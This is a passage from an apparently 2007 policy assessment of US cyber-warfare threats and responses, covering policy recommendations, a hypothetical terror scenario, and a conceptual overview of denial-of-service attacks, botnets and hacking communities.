Several social considerations exist with regard to cyber-warfare policies. One is the loss of

privacy in cyberspace; another is the censorship of the Internet which would occur if the

government began to block certain websites. These privacy concerns make the cooperation of

public and private sector entities even more essential.

31

"National Policy and Guiding Principles." National Strategy to Secure Cyberspace. Feb. 2003. US Government.

<http://www.whitehouse.gov/pcipb/policy_and_principles.pdf>.

17

0.6.4 Stakeholders

American citizens and organizations are the primary stakeholders with regard to national cyber-

warfare policy. That said, virtually everyone can be considered a stakeholder, either for their

direct use of the Internet or for their reliance on the critical infrastructures that depend on

computer systems. The NSSC describes five specific stakeholder groups: home and small

business computer users, large enterprises such as corporations and universities, critical sectors

and infrastructures, the nation as a whole, and the international community.32

0.6.5 Policies of Prevention

While the government is taking steps to improve collaboration between groups in the response to

cyber-attacks, much of the task of actually preventing cyber-attack is still in the hands of the

private sector.

One of the most effective means of preventing cyber-attacks is to affect a widespread change in

behavior among systems administrators; for example, if they kept their computer systems up-to-

date with the latest security patches, a major vulnerability would be reduced. Many tools exist to

safeguard against cyber-attacks, such as antivirus programs and firewalls, but they are optional

purchases and are not available for many less standardized computer systems. Similarly, there

are many different competing cyber-security certification programs and no uniform process for

licensure or certification. Also, software and hardware makers are not legally required to include

security features of any kind in their products.

One controversial policy option would be to require by law that all computers be secured in

specific ways; however, such a law would need to be abstract enough to accommodate the

evolving nature of threats and should balance added security with added costs. Another is to hold

software producers and systems administrators responsible for damage caused by their products

or systems; again, the added cost of production and maintenance must be weighed. Also, a

uniform process for cyber-security licensure and certification could be created to ensure a

standardized level of cyber-security knowledge.

One distinct area to consider is the prevention of cyber-attacks on infrastructure systems. A

policy option in this area is to regulate a minimum level of cyber-security for all components of

the national infrastructure, because one weak link can allow an attack to damage entire areas of

infrastructure.

0.6.6 Policies of Response

It is difficult to identify and apprehend cyber-attackers. Because of this, legal action against

them is typically handled at the federal level. However, numerous case studies exist to suggest

that the sentencing of convicted cyber-attackers is not nearly large enough to match the damage

32

National Policy and Guiding Principles." National Strategy to Secure Cyberspace. Feb. 2003. US Government.


18

caused by attacks. Accordingly, one policy option is to increase minimum and maximum

sentencing guidelines for cyber-attackers, and to pursue longer sentences more vigorously.

The National Cyberspace Response System is the current strategy to handle responses to cyber-

attacks. This response system includes analysis of cyber-attacks, communication of warnings

when a cyber-attack might be repeated or may spread, reporting and classification of incidents,

and recovery from a cyber-attack.33

Several recent exercises were organized to coordinate response efforts between public and

private sector organizations, and were reported to be successful in increasing communication

between groups.34

However, many private sector organizations worry of damage to their public

image if a cyber-incident occurs and is publicized, and others think the existing channels to relay

information are insufficient.35

New policies should define more clearly a method of communicating cyber-incidents to the

public, so the actual risks and impacts of incidents will be understood. Also, private sector

organizations could be given financial incentives for communicating reports of their cyber-

security measures and any incidents that occur. Finally, as attacks on the Internet can affect the

world as a whole, the United States should open a new dialogue with other countries to create a

uniform cyber-attack response policy.

0.6.7 Policies for Public Awareness and Training

Several programs are in place to promote public awareness of cyber-security and the cyber-

security training of IT professionals. For example, US-CERT offers e-mail bulletins to inform

the public of incidents and security tips, and the NCSD has created a website, Stay Safe Online,

to inform computer users in all sectors of ways to improve personal cyber-security practices.36

However, while some studies have shown an awareness of cyber-security concerns among

corporate IT personnel, others have shown that IT personnel fail to follow the most basic cyber-

security measures, such as reporting incidents to anyone outside the corporation.37

Because the US-CERT bulletin and Stay Safe Online have not reached high levels of public

exposure, increased federal funding for these programs is needed. Another option is to provide

financial incentives for small businesses and enterprises whose employees complete a basic

cyber-security course. A uniform licensure and certification process, as described in the Policies

for Prevention section, could help to ensure the proper level of training for IT personnel.

Another option is to create a national database of cyber-incidents that occur at critical

33

Ibid 34

"Fact Sheet: Protecting America’S Critical Infrastructure – Cyber Security." US-CERT. Department of Homeland

Security. <http://www.us-cert.gov/press_room/050215cybersec.html>. 35

"Government Collaboration Groups and Efforts." US-CERT. Department of Homeland Security. <http://www.us-

cert.gov/federal/collaboration.html>. 36

National Cyber Security Alliance: Stay Safe Online. Retrieved October 31, 2007, from Stay Safe Online Web site:

http://www.staysafeonline.org/ 37

Gagnon, B. (2004). Are We Headed For a Cyber-09/11? The American Failure in Cyberstrategy. Conference

Papers -- International Studies Association, Retrieved October 24, 2007, from Academic Search Premier database.

19

infrastructure elements and a daily cyber-security threat level indicator; these would provide an

incentive for the private sector to maintain a strong public image by preventing incidents and

would raise overall public awareness.

0.6.8 Policies for Government Cyber-security

The federal government is responsible for securing many critical institutions such as the military,

emergency services, and financial institutions from cyber-attack. Accordingly, one priority of

the government must be to protect its own computer systems. The OMB has assessed the

vulnerabilities of many computer systems within the government and has established basic

federal guidelines for agencies to follow; the guidelines must be met before an agency can obtain

funding for system upgrades.38

A process has been established by which agencies can improve

security and wok towards meeting those guidelines.

However, at the level of individual agencies, there is no uniform cyber-security testing

procedure, and many agencies rely on outside contractors to upgrade their computer systems.

And while system upgrades are checked by the OMB for cyber-security measures, existing

systems lack basic security measures such as password complexity requirements and security

patches.

At an agency level, new policies are needed to mandate more robust passwords and more

frequent password changes; another possible measure is the creation of a physical identification

card system whereby “smart cards” would be needed to access a government computer. Also,

the IT departments of government agencies should be required to document the structure of their

computer systems and their installation of security patches.

One agency of special concern is the FAA. A mandate could be issued that future development

of the FAA’s air traffic network continue to favor decentralized, redundant control centers.

Also, the FAA (and possibly other government agencies as well) could be required to limit the

access of outside IT contractors to only the areas that directly relate to their work assignments.

Across all agencies, best-value evaluations should be used when selecting outside contractors;

the OMB could establish which contractors provide the best services and establish a certification

system. Another possible policy is that a federal “red team” of security testers be created to

periodically test the cyber-security vulnerabilities of government computer systems.

0.6.9 Policies for U.S. and International Cyber-warfare Collaboration

Because of the Internet’s worldwide presence and the interconnectedness of computer systems

around the world, the United States must enact policies to secure our own systems from attacks

originating from other countries. Of equal importance are policies for nations to work together

to secure the global cyberspace.

38

“Priority IV.” The National Strategy to Secure Cyberspace. February 2003. 30 Oct. 2007

<http://www.whitehouse.gov/pcipb/priority_4.pdf>

20

To protect the nation from attacks originating abroad, more robust preventative and

counterintelligence capabilities must be developed; almost no true counterintelligence options

exist. Also, a better system for reporting cyber incidents to system administrators around the

nation is needed.

Many efforts have been made to influence the cyber-security efforts of other nations, including

U.S. discussions with the Organization of Economic Cooperation and Development (OECD), the

G-8, and the Asia-Pacific Economic Cooperation forum (APEC).39

However, there is no widely

accepted international treaty or agreement to establish a global cyber-security policy, and no

international network of agencies for information relay exists.

The federal government should work with other nations to adopt a set of international cyber-

security standards to be followed, to ensure all international computer systems have a minimum

level of security. One starting point in a global cyber-security policy could be the creation of a

regional North American cyberspace “safe zone”40

, in which the U.S. would work with Canada

and Mexico to ensure the countries work to solve mutual cyber-security issues. Other regional

alliances and unions, such as the European Union, should be encouraged to take similar steps.

In 2001, an international Convention on Cyber-crime was held and a treaty to promote

international cyber-crime collaboration was ratified by 43 countries. However, greater efforts

should be made to follow the treaty’s guidelines and to encourage more nations to sign the treaty.

Other nations have their own cyber-warfare policies that the United States can learn from. The

U.K.’s policies are similar to ours, but their legal framework to handle cyber-attackers is more

robust. Germany’s policy differs from ours in that they consider any attempt to control German

media an act of war, and they are considering whether economic cyber-warfare could be used

during a conflict with another nation. Russia considers cyber-attacks to be second only to

nuclear attacks in terms of danger, and their policy is relatively aggressive; however, they have

also made it illegal for Russian citizens to carry out a cyber-attack. China is actively developing

its offensive cyber-warfare capabilities, which demonstrates the need for international

collaboration.

0.6.10 Policies for Military Use of Cyber-warfare

One policy area not discussed in the NSSC concerns the military’s policy with regard to the use

of cyber-warfare against, and by, the Armed Forces. Cyber-warfare options have historically

been handled by the Space Command, but in 2007 the Air Force was given that responsibility;

the Computer Network Operations group (CNO) is specifically tasked with military cyber-

warfare policies. 41

39

“Priority V.” The National Strategy to Secure Cyberspace. February 2003: 51. 23 Oct. 2007

<http://www.whitehouse.gov/pcipb/priority_5.pdf> 40

Ibid 41

Wilson, Clay, (2007) “CRS Report for Congress: Information Operations, Electronic Warfare,

21

There have been no confirmed uses of cyber-warfare by the United States military, though cyber-

warfare tactics were considered and, some rumors state, used in Kosovo and Operation Iraqi

Freedom.42

Also, the federal government is also leading efforts to promote cyber-warfare

education, as evidenced by a cyber-warfare scholarship program sponsored by the Department of

Homeland Security and the National Science Fund.43

It is likely that the use of cyber-attacks as an alternative to conventional attacks can reduce

civilian damages, because infrastructure systems could be shut down temporarily but not

permanently damaged; capabilities to carry out this sort of cyber-attack should be researched.

Consideration of cyber-warfare tactics should be integrated into national strategic planning and

any future discussions of redefining the military’s mission. One policy option is to expanding

cyber-warfare training within the military and at universities to make our Armed Forces more

skilled at cyber-warfare tactics, should the need to use them arise. Also, a set of rules to guide

our use of cyber-warfare tactics, both offensively and defensively, should be developed, and a

more clearly defined national cyber-warfare strategy should be developed. Finally, an

international convention should be developed, possibly through the United Nations, to handle the

legality of offensive cyber-attacks.

0.7 Conclusion

0.7.1 Is Cyber-warfare a Threat?

Our vulnerability to cyber-attacks is clear, especially with the means of attack are so readily

accessible. However, the effects from these vulnerabilities are still limited, and best exploited

only with a coinciding physical attack. We do no face the doomsday that some predict, but we

do have a system in need of a drastic overhaul and upgrade. With better implementation of

established cyber-security practices, along with proactive research and development, we can

reduce the glaring weaknesses in our cyber-defense and mitigate the vast majority of cyber

threats.

0.7.2 The Way Forward

This assessment’s recommended “best policies” are divided into policies to implement

immediately, policies for the near future, and areas for future research.

and Cyberwar: Capabilities and Related Policy Issues” 30 October, 2007. <http://stinet.dtic.mil/cgi-

bin/GetTRDoc?AD=ADA466599&Location=U2&doc=GetTRDoc.pdf?> 42


<http://www.pbs.org/wgbh/pages/frontline/shows/cyberwar/interviews/arquilla.html> 43



bin/GetTRDoc?AD=ADA466599&Location=U2&doc=GetTRDoc.pdf?>

22

The policies to implement immediately are relatively simple and no significant barriers to their

implementation exist. The government should immediately make sentencing standards for

cyber-criminals more severe, increase publicity funding for existing federal programs for cyber-

security awareness, require government agencies to document their cyber-security progress, and

expand cyber-security training within the military and at universities.

The policies for the near future may take a few years to develop. For instance, a uniform cyber-

security licensure can be created, and a more robust process can be made to test the cyber-

security of federal agencies. Policies to encourage other nations to prevent cyber-attacks can be

developed, and international cyber-security standards can be agreed upon. Cyber-warfare can be

given a greater role in national strategic and military planning. Finally, a legally binding set of

security requirements can be made for new software and hardware products.

Though it will require extensive research, planning, and diplomatic efforts, a goal should be set

to establish and ratify within ten years an international treaty creating a uniform cyber-security

policy, a framework for interagency cooperation and response, and a global network for

information sharing. In the same time period, a goal could be made to establish a cyber-warfare

equivalent to the Geneva Convention to establish rules governing military use of cyber-warfare.

Although there is never an impenetrable defense from cyber-attacks, the United States can

greatly limit the threat of cyber-warfare over time by implementing these proactive policies.

23

1 Introduction

24

It is difficult to grasp how reliant the United States has become on computers and the networks

that connect them. The Internet and computer networks are absolutely vital to a functioning

electric power grid, a consistent water supply, nearly all communications networks, many

transportation systems, key financial systems, public health systems, postal service, government

and defense, and many other systems that support our nation. The Internet, originally designed

to allow communication in the event of a nuclear war, could be the next weapon to attack a

society revolving around information technology.44

Cyber-warfare indisputably has the potential to cause catastrophic damage to these systems in a

world vastly influenced by cyberspace. Given this assumption, one must address the probability

of various types and combinations of cyber-attacks that could damage critical systems, as well as

the options for response and prevention. Securing this nervous system will require significant

resources from the public and private sector, as well as significant efforts from everyone

connected to the Internet. Given the power and influence of cyber-warfare, there are also

possibilities of cyber-warfare as an effective offensive weapon that must be considered.

1.1 What Is at Stake?

The worst-case scenario of cyber-warfare would involve a combination of cyber-attacks and

physical attacks. However, to get an idea of the potential scale of cyber-attacks, consider this

hypothetical situation.

It is a sunny week day in Chicago. A few days earlier, a terrorist organization hacks into the

federal government’s electronic shipping manifest system. The terrorists find a shipment of

nuclear material, and intercept the truck and steal its contents. They then load this nuclear

material along with a detonator onto a chartered plane at a local air strip.

Simultaneously, the terrorist organizations hack into the regional power grid and FAA computer

systems. Once in the power grid, they gain control over a key power generator, and force it out

of its natural oscillation, which in turn destroys the generator, and crashes the power grid in the

greater Chicago area. In the FAA system, hackers knock out the radar systems in the area, and

delete all recorded flight plans in the region.

The chartered plane, in the air near Chicago, uses the immediate confusion to fly into restricted

airspace directly over the heart of the city, and detonates in mid-air, raining nuclear material

down over the entire city.

Lastly, the terrorists hack into the SCADA system controlling Chicago’s water treatment

facilities. Through a series of commands, they rout millions of gallons of untreated wastewater

to release into the Chicago River, destroying the water quality and ecosystems down river.

Ultimately, the water flows into the Mississippi River.

All told, these terrorists rained radiation onto nearly 3 million residents, and required the entire

area to be evacuated until the federal government could determine the radiation levels, and either

44

Global Society: Journal of Interdisciplinary International Relations; Jan2003, Vol. 17 Issue 1, p89, 9p

25

begin a clean-up program or abandon the city entirely. The mixture of sewage and the threat of

radiation flowing down the Mississippi River creates panic all along the river basin, which

includes St. Louis, Memphis, and New Orleans. Power in the region is significantly damaged,

requiring new generators to return to pre-attack output level, straining surrounding systems,

potentially knocking them offline as well. The cost in lives and dollars is unknown, but far

higher than any attack on US soil.

1.2 Is Cyber-Warfare a Real Threat?

While it is highly unlikely that a terrorist organization could currently coordinate an attack as

massive and complex as the scenario described above, each component of the scenario is more

realistic by itself. Each component has either been described as a possibility by the United States

government or private-sector entities, or has been shown to be possible by actual cyber-incidents.

Is cyber-warfare a real threat? The immediate answer is that cyber-warfare is real enough that it

cannot be ignored, although the scope and magnitude of this threat varies across different areas

of key infrastructure. Even in cases where the current threat is limited, the threat will increase in

the future.

Some critics of this conclusion rely to the history of cyber-warfare.45

To date, there have been

no successful large-scale cyber-attacks on the United States that have brought significant

economic or social damage on a national scale. Many professionals in this group of skeptics

contend that terrorist organizations are not capable of catastrophic cyber-attacks.46

These

skeptics are also comfortable with nation-states who have cyber-warfare capabilities because

there is currently not a strong motive to use their resources aggressively. While nation-states do

not currently have an interest in engaging in a large-scale cyber-war, the majority of cyber-

attacks against the United States government are believed to be sponsored by other nations.

There is also evidence that international terrorist organizations are actively recruiting and

training specialists to adapt their operations to the cyber world.

After the horrific attacks on September 11, 2001, reports repeatedly claimed that crashing

commercial airliners into large buildings was an attack method that no one could have predicted.

These reports did not take into account al-Qaeda’s attempt to crash an Airbus A300 into the

Eiffel Tower in 1994 before French Special Forces stormed the plane.47

In 1994, the CIA

prevented a plot to crash a plane into CIA Headquarters in Langley, Virginia.48

Ramzi Yousef

was arrested in 1995 in the house of a family member of Osama bin Laden with plans for a

suicide bombing of CIA headquarters and exploding eleven other U.S. Commercial Jets as they

approached airports.49

The Federal Research Division warned in 1999 that “Suicide bomber(s)

45

Laprise, John. IEEE Technology & Society Magazine. Vol. 25 Issue 3, pg. 28. 46

Ibid 47

http://www.cooperativeresearch.org/entity.jsp?entity=eiffel_tower Profile: Eiffel Tower. December 24, 1994: Al-

Qaeda Connected Militants Attempt to Crash Passenger Jet into Eiffel Tower. 48

http://www.frontpagemag.com/articles/Read.aspx?GUID={245984FA-D9DF-46E9-8EF3-7B5259A51C0D}

Clinton and 9/11. Favish, Allen J. FrontPageMagazine.com Tuesday, October 14, 2003. 49

http://query.nytimes.com/gst/fullpage.html?res=9F01E1DD1E39F933A05756C0A960958260&sec=&spon=&page

wanted=all Wiren, Christopher S. May 30, 1996. The New York Times. Plot of Terror in the Skies Is Outlined by

a Prosecutor.

http://www.cooperativeresearch.org/entity.jsp?entity=eiffel_tower

http://www.frontpagemag.com/articles/Read.aspx?GUID=%7b245984FA-D9DF-46E9-8EF3-7B5259A51C0D%7d

http://query.nytimes.com/gst/fullpage.html?res=9F01E1DD1E39F933A05756C0A960958260&sec=&spon=&pagewanted=all


26

belonging to al-Qaida's Martyrdom Battalion could crash-land an aircraft packed with high

explosives (C-4 and Semtex) into the Pentagon, the headquarters of the Central Intelligence

Agency (CIA), or the White House.”50

Because there were no previous successful attacks

similar to those that occurred on September 11, 2001, America was unprepared and utterly

shocked. A similar rationale is being applied to the possibilities of cyber-warfare. Evidence will

be revealed in our research that cyber-warfare could be another catastrophe waiting to happen,

and the government must take proactive measures to prevent another enduring loss. There are

warning signs that terrorist organizations such as al-Qaeda are developing cyber-warfare

capabilities, as well as clear signals that foreign nations are preparing for a future cyber war.

There are clear warning signs—as this assessment will show—that the United Stated of America

is vulnerable to cyber-attacks.

1.3 Defining Cyber-attacks

Before we can begin to assess cyber-crime, cyber-terrorism, and cyber-warfare, we must first

differentiate between these concepts in order to establish the scope that each covers. There are

many nuances between the three, including the scale of the cyber-attack and the objectives that it

is intended to achieve. Defense Acquisition University classifies any cyber-attack that is not

intended to threaten national security or further operations against national security as cyber-

crime51

. Cyber-terrorism, on the other hand, refers to cyber-attacks launched by individuals or

small terrorist organizations that are intended to further political or social objectives by coercing

a government or its people52

. Cyber-warfare has the same objectives as cyber-terrorism, except

that it consists of cyber-attacks launched by a national government as an act of war, just as a

physical attack would be53

.

One important distinction is that to be considered an act of cyber-terrorism or cyber-warfare, a

cyber-attack must be an intentional operation against national security. An unintentional attack

on national security, such as that of an inept hacker, is considered cyber-crime as long as the

intent of the attack is self-serving, and not intended to further a national or ideological objective.

However, that is not to say that these unintentional attacks on national security cannot be as

harmful as cyber-warfare and cyber-terrorism, and for the purposes of this assessment, they will

be treated the same way. While cyber-crime is a major problem in the US and many other

countries, this assessment is concerned primarily with the effects of large-scale cyber-attacks on

national security, and how the United States can be best prepared to both defend against and

potentially execute them.

50 http://www.fas.org/irp/threat/frd.html The Sociology and Psychology of Terrorism: Who Becomes a

Terrorist and Why? Hudson, Rex A. September, 1999. A Report Prepared under an

Interagency Agreement by the Federal Research Division, Library of Congress 51

Alford, Jr., Lt. Col. Lionel D. "Cyber Warfare: Protecting Military Systems." Acquisition Review Quarterly

Spring 2000: 101-120. 18 Oct. 2007 <http://www.dau.mil/pubs/arq/2000arq/alford.pdf> 52

Denning, D. (2001). "Is Cyber Terror Next?" New York: U.S. Social Science Research Council, at

http://www.ssrc.org/sept11/essays/denning.htm 53

Alford, Jr., Lt. Col. Lionel D. "Cyber Warfare: Protecting Military Systems." Acquisition Review Quarterly

Spring 2000: 101-120. 18 Oct. 2007 <http://www.dau.mil/pubs/arq/2000arq/alford.pdf>

http://www.fas.org/irp/threat/frd.html

27

2 Tools for Cyber-Attacks

28

2.1 Hacking

Hacking is a blanket term that has been seized by the media. Traditionally, a “hacker” has

simply been a skilled computer user.54

A number of terms, including “cracker” specifically refer

to malicious computer users who usually garner the attention of the media. Due to the popularity

and familiarity of the term, “hacking” will be used in this document to refer to all forms of

cyber-attacks, and “hacker” for the individuals initiating them.

Hackers are usually either socially or financially motivated. The Internet has given hackers a

community in which to share their exploits, in both senses of the word, and give ideas to new

avenues of attack. Often, a newly found vulnerability will generate a flurry of activity in a

hacking community, with different groups or individuals competing to be the first to distribute a

new exploit. Alternatively, there are many documented cases where hackers discovered

vulnerabilities in popular software and operating systems and offered to sell these finds on

underground auction sites.55,56

These motivations are in addition to the motivation of theft

through fraud and identity theft.

Hackers’ primary goals typically consist of either information theft or damage to computer

systems. Procured sensitive information can be the gateway to various forms of fraud, such as

identity theft, or vulnerable systems such as SCADA systems. Hackers use common

vulnerabilities in sensitive systems and even the aforementioned stolen information to cripple

vital processes and functionality. With regards to cyber-warfare, possible targets include

classified data, and a bevy of vital systems with control over communication and infrastructure.

The tools outlined in this section are only a small view of a hacker’s arsenal, but they have been

defined because awareness is the first step to eliminating the vulnerabilities they create, and they

offer something of an idea of how hackers view the systems that governments and corporations

use to store and transfer information.

2.2 Denial of Service Attacks

A “Denial of Service” attack, or DoS attack, is one of many methods employed by participants in

cyber-warfare to cause damage. The damage caused by such an attack is the disabling of a

computer or network. The extent of the damage is dependent upon the functions of the system

being attacked; typically the attacks cause economic damage and sever communications. As

organizations become more dependent on computers and the Internet, the consequences of DoS

54

Raymond, Eric. The on-line hacker Jargon File 4.4.7. 29 Dec 2003. 26 Nov 2007

http://www.catb.org/jargon/html/index.html 55

Naraine, Ryan. Hackers Selling Vista Zero-Day Exploit. 15 Dec 2006. eWeek.com. 26 Nov 2007.

<http://www.eweek.com/article2/0,1895,2073611,00.asp> 56

Evers, Joris. Russian hackers ‘sold WMF exploit’. 3 Feb 2006. ZDNet.co.uk. 26 Nov 2007.

<http://news.zdnet.co.uk/software/0,1000000121,39250232,00.htm>

29

attacks become more dangerous.57

There are many specific types of DoS attack, but the common

effect of them all is that legitimate users of the services provided by a system are prevented from

using that system. CERT (Computer Emergency Response Team) classifies the following

activities as DoS attacks:

● attempts to "flood" a network, thereby preventing legitimate network traffic

● attempts to disrupt connections between two machines, thereby preventing access to a

service

● attempts to prevent a particular individual from accessing a service

● attempts to disrupt service to a specific system or person (CERT)58

The DoS attack takes advantage of the most basic limits of computers: finite memory, finite

processing speed, and finite communication bandwidth. These limits, while rapidly growing, will

always remain finite and cause problems when attackers manage to breach them. Once a

computer runs out of a limited resource that it needs to function, the system becomes disabled,

and can stay disabled for a wide range of time, depending on the style of DoS attack used and the

determination of the attacker.

In addition to consumption of the scarce resources of computers, Denial of Service can also be

achieved by altering or destroying configuration files needed by a system, or even through

physical destruction of components. Any device that communicates with a computer and is

accessible through a network is vulnerable. The embedded computers that are present in many

electronic devices have the same limits and vulnerabilities to DoS attacks as the common

desktop systems, especially the ones that are connected to the Internet constantly. It is dangerous

to assume that a device that does not look like a typical desktop computer cannot be a target, or

that potential attackers will be unable to communicate with a device. Any computer-based

system that can be communicated with remotely, and would have negative consequences if

authorized users of the system were prevented from using it, can possibly be damaged by a

Denial of Service attack.

2.2.1 Vulnerabilities

Owners of computer systems often underestimate their vulnerabilities and fail to consider taking

measures to prevent or respond to DoS attacks. A common assumption is that the system does

not communicate to remote devices enough to be affected, or that only popular web shopping

sites suffer from this attack. Individuals can also be targeted in addition to organizations,

potentially cutting off a person's communication completely. A wide variety of machines rely on

networks to function, which are not necessarily public web sites, though the web based incidents

tend to be the most visible.

57

Moore, David et al. Inferring Internet Denial of Service Activity. ACM Transmission on Computer Systems. Vol.

24, No. 2, May 2006, 115–139. 58

CERT Coodination Center – Denial of Service Attacks. 4 Jun 2001. US CERT. 30 Oct 2007

<http://www.cert.org/tech_tips/denial_of_service.html>

30

2.2.2 Sensor Networks

Sensor networks are an example of a class of practical devices that Denial of Service can target

to cause harm. Various sensor devices are used to protect and monitor military, environmental,

and other safety-critical infrastructures and resources. The failure of certain sensors can

potentially cause physical damage to people. Machines exist that can record and transmit data on

many different environmental properties, and are increasingly reliant on computers to function.

These new sensor networks are often found replacing older systems where machinery was more

confined to a limited and controlled environment. Systems of sensors communicate over a

network with a computer which processes the data acquired by the devices and acts on the

information appropriately. It is easy to imagine sensor networks forming warning systems and

becoming part of military scenarios.

With new advances in technology, sensor networks are finding many new applications and

becoming smaller and cheaper, though many still use them under the assumption that they still

operate in their old enclosed environments. The design of many sensor devices do not take

security into consideration during the design process, allowing intelligent adversaries to hinder

the usage of often critical information.59

Mobile devices like PDA's and cellular phones are also valid targets for DoS attacks. A mobile

device can be remotely shut off, have its communications channels flooded, or be made to drain

its battery power. Many devices can be crashed and made to shut off by sending specific pieces

of data. Because phones and PDAs are small and weak compared to typical computers,

overwhelming them with more messages than they can handle is not difficult to accomplish.

Battery exhaustion techniques are a style of DoS attack unique to mobile devices. It is possible to

feed data to a mobile device that forces its power to drain faster, such as repeatedly requesting a

connection to the device, even if the connection is always denied. Portable wireless devices have

become popular and widely depended upon in society. As mobile devices replace older

technologies, many inappropriate assumptions from those old technologies are still applied to the

new, which can cause the risk of a DoS attack to be neglected.60

2.2.3 Denial of Service on the Internet

Denial of Service attacks on different systems have been happening for decades, but have not

gained much attention until the first “Distributed Denial of Service” attacks, or DDoS attacks,

started happening against computers connected to the Internet. DDoS attacks are different from

regular DoS attacks in that the target is brought down by many networked computers working

together. Regular DoS attacks on the Internet were not seen as a large threat because detecting an

attack and blocking it was relatively simple. Malicious messages would come from a specific

computer, which could be traced and banned from communication. Distributed DoS attacks were

59

Wood, Anthony & Stankovic, John. Denial of Service in Sensor Networks. IEEE – Computer. Oct 2002. 54 - 62 60

Dagon, David. Mobile Phones as Computing Devices: The Viruses Are Coming!. IEEE – Pervasive Computing.

Oct – Dec 2004. 11 - 15

31

first noticed in 1999, which employed hundreds of computers in bringing down a target system,

and presented new challenges to computer security experts61

.

Typically, when a target is bombarded with messages from hundreds of machines at the same

time, it is forced to shut down for several hours. The sources of the messages are then tracked

and blocked. Sites on the Internet can potentially have huge capacities for speed and memory,

which require a skillful manipulation of larger numbers of computers in order to be shut down.

Though some targets have a huge capacity, they remain vulnerable due to the ways attackers

have adapted their techniques.

One of the most significant DDoS attacks happened in February 2000, during which several of

the world’s most frequently used web sites including Yahoo, Amazon, Buy.com, CNN, eBay,

ZDNet, E Trade, and Excite were made inaccessible to Internet users. Many victims of the DDoS

attack opted not to admit being attacked in order to avoid bad press and prevent copycats. These

large shopping sites lose large amounts of money when they are not operational, and threaten the

confidence in the online economy. This DDoS attack was so severe that Internet speed world-

wide was slowed down.62

2.2.4 Executing a Distributed DoS Attack

The method used to commit a DDoS attack like the incident in 2000 is twofold. First, the

attacker must gain control over a team of computers, building a “botnet” or accumulating

“zombies. Usually the process of seizing control over Internet connected computers is an

automated process. An attacker discovers a flaw in the security of many systems, and performs a

scan on large pieces of the Internet, which finds the specific systems that contain the desired

security flaw. Computers connected to university networks or other fast and persistent

connections make ideal zombies because they can send the attack data faster than most systems

on the Internet. It is possible for attackers to probe the Internet for potential botnet computers in

such a way that even recently connected systems can be found and controlled before their owners

tell anybody that they exist. People all over the planet are constantly scanning large parts of the

Internet to the point that it is almost inevitable that every system will be probed by a potential

attacker, even if nobody knows about the system.63

Once a set of vulnerable systems is found, the attacker uses an automated tool known as an

“exploit” in order to gain control of the systems. The attacker then destroys the evidence that can

be used to identify the source of the attack, and installs tools that allow the system to be

commanded remotely and anonymously. To form the attack group, the attacker assigns one

machine as the master, while the rest of the set act as daemons under the master system’s

command. With a team of computers under the attacker’s control, usually unknown to the actual

owners of the breached systems, the attacker can then give the signal to the master system, which

61

Kessler, Gary. Defense against Distributed Denial of Service Attacks. Nov 2000. 30 Oct 2007

<http://www.garykessler.net/library/ddos.html> 62

Garber, Lee. Denial-of-Service Attacks Rip The Internet . IEEE – Computer. Apr 2000. 12 - 17 63

Know Your Enemy – Tools and Methodologies. 21 Jul 2000. 30 Oct 2007.

<http://www.honeynet.org/papers/enemy/index.html>

32

starts an attack on a specific target. The following diagrams illustrate the process of forming a

botnet and attacking a system. In the first picture, the DDos master (blue computer) reaches out

to the compromised systems (magenta computers). Upon command of the DDos master, the

compromised computers flood the victim computer (red computer) and overload the system.

Figure 2.1 Botnet Diagram64

There are several types of attack that are used to bring down systems in different ways. One

common type of attack is known as a UDP flood, during which the team of computers sends

generated characters to their target, and requests that they be repeated back. The volume of data

coming into the target system becomes so great, that it uses all of its resources to receive the

dummy messages and respond to them, to the point that the target system is unable to spare

enough time to handle legitimate uses.

64


<http://www.garykessler.net/library/ddos.html>

33

Another common type of attack is called a SYN flood, which takes advantage of the finite

memory that the target uses to remember who it is communicating with. Computers on the

Internet are able to initiate transfers of large amounts of information, but must first negotiate a

few details before the information can be exchanged. In a SYN flood attack, the team of attack

systems each initiates many bogus connections with the target system, forcing the victim to fill

up its memory with the false connection information. Once the targets memory is full, it is no

longer able to initiate the connections it needs to communicate with its true users.

In addition, there is a style of attack known as a the “smurf”, which is executed by sending a

large number of computers a “ping” message, but forging the return address so that each pinged

system sends its reply to a victim system, overwhelming it with information until it cannot

process valid requests. A “ping” is a message used by computers to check if they can still contact

each other, one computer sends and the other replies so that the system knows that the network is

working correctly. When used for an attack, a ping message is sent, but the sender is forged, so

that the receiver directs its reply to the target provided by the attacker, rather than sending the

ping replies to the true source of the message. This final type of attack is unique in that the team

of computers does not need to be breached by the attacker and fully controlled because ping

messages are a standard service present on most computers. The messages sent are small

compared to other types of attacks, making “smurf” style DoS attacks less dangerous than the

flooding techniques.65

2.2.5 Hacking Communities

Gathering groups of compromised systems for committing DoS attacks and engaging in other

forms of Internet based disruption has grown into a widespread activity on the Internet. Hackers

have formed groups which allow them to develop skills and align themselves with different

interests and conduct cyber-warfare. Many hacker groups are based on ideology or loyalty to a

country, but diverse hacker teams containing members from all over the planet are also common.

In these communities, hackers can be found bragging about their achievements, making

demands, exchanging attack techniques and even selling access to breached computers and

stolen credit cards. Usually, these hacking groups are passionate private citizens operating

without the instruction of any government, though some governments are criticized for

encouraging the activities of these groups.66

Understanding how these communities work helps the effort to deal with their threats. Often, a

hacker will discover a vulnerability that is likely to be present in many computers, and will use

chat rooms and bulletin services to publish that information to others. Hackers quickly develop

scripts which can be traded and executed to take advantage of security flaws and seize control

over the vulnerable systems. Often, groups develop programs which automate and simplify the

process of breaching a system so that a large number of attackers who might be unfamiliar with

the details of the software flaw can still use it to gain control over systems. With the help of these

communities, potential attackers do not need to develop much technical expertise, but instead

65

Garber, Lee. Denial-of-Service Attacks Rip The Internet . IEEE – Computer. Apr 2000. 12 - 17 66

Know Your Enemy – Motives. 21 Jul 2000. 30 Oct 2007. <http://www.honeynet.org/papers/motives/index.html?

34

only need to know how to find exploit scripts and use tools provided by others. The community

then allows hackers to specialize in specific tools or vulnerabilities. The attack on major websites

in 2000 was conducted using a community tool known as trinoo.67

2.2.6 Case Study - United States and China Cyber-Conflict in 2001:

When groups within the hacking community align themselves with conflicting interests,

situations can quickly evolve into “cyber-warfare”. An incident between hackers in the United

States and China happened in April of 2001, when an American spy plane and a Chinese jet

collided over the South China Sea, killing the Chinese pilot and forcing the American plane to

land in China. Once news of the incident was out, hackers from both countries began attacking

each other's systems, often breaching them and leaving messages to their enemies. The incident

attracted the attention of Wired Magazine, who described the attacks as a “private war” and

“cyber-retaliation”. The hackers from both countries were not supported by their states, but

rather were amateur computer hackers who channeled their anger over the airplane collision into

